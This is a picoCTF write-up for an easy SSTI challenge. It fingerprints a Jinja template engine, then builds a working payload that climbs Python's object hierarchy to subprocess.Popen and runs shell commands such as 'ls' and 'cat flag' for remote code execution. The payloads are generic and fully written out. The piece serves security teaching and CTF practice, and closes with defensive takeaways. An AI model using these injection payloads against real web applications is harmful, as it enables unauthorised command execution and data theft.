PicoCTF — Write-Up

Server-Side Template Injection (SSTI1)

Category:Web Exploitation

Points:n/a

Author:Kelvin Creighton

Difficulty:Easy

#web#ssti1#python#jinja

Research

What is SSTI?

Server-Side Template Injection occurs when an attacker can inject malicious input into a server-side template.
A server-side template is a file used by a web application to generate dynamic content on the server (like the blueprint of the web app).

Common Server-Side Template Engines

Python: Jinja, Django
PHP: Twig, Blade
Java: FreeMarker, Thymeleaf
Ruby: ERB
Javascript: EJS

Information Gathering

Start by determining if the application evaluates template expressions from user input, and then identify the specific template engine in use.

STEP 01Basic Quick Check

INPUT{{7*7}}

OUTPUT49

Reason: This confirms the vulnerability and rules out engines that do not use {{...}} syntax. It likely points to Jinja or Twig.

STEP 02Fingerprinting the Engine

INPUT{{7*'7'}}

OUTPUT7777777

Reason: If it were Twig, it would output 49. The output 7777777 confirms Python is evaluating the expression, meaning the engine is Jinja. Running {{self.__class__}} verifies this by outputting
<class 'jinja2.runtime.TemplateReference'> .

Creating the Payload

The goal is to escape the sandbox by traversing Python's Method Resolution Order (MRO) to find a class that allows executing OS commands.

STEP 01Finding the Object Class

INPUT{{''.__class__.__mro__[1]}}

OUTPUT<class 'object'>

Reason: Starting with an empty string '', we access its class str, then its MRO tuple, and grab the base object class at index 1.

STEP 02Listing Subclasses

INPUT{{''.__class__.__mro__[1].__subclasses__()}}

OUTPUT[... list of classes ...]

Reason: We display all classes that inherit from object. We are looking for classes in os or subprocess modules. We find subprocess.Popen at index 356.

STEP 03Remote Code Execution

INPUT{{''.__class__.__mro__[1].__subclasses__()[356](['ls'], shell=True, stdout=-1).communicate()}}

OUTPUT(b'__pycache__\napp.py\nflag\nrequirements.txt\n', None)

Reason: We instantiate subprocess.Popen to run the ls command. We see a file named flag in the output directory list.

STEP 04Extracting the Flag

INPUT{{''.__class__.__mro__[1].__subclasses__()[356](['cat flag'], shell=True, stdout=-1).communicate()}}

OUTPUT[Flag Content]

Reason: Running the cat flag command through the Popen shell allows us to read the flag and solve the puzzle.

Key Takeaways

Never pass unsanitized user input directly to a template engine's rendering context.
Python's class inheritance hierarchy (__mro__, __subclasses__) allows powerful sandbox escapes if remote code execution is achieved.

Flag

Captured Flag

picoCTF{...}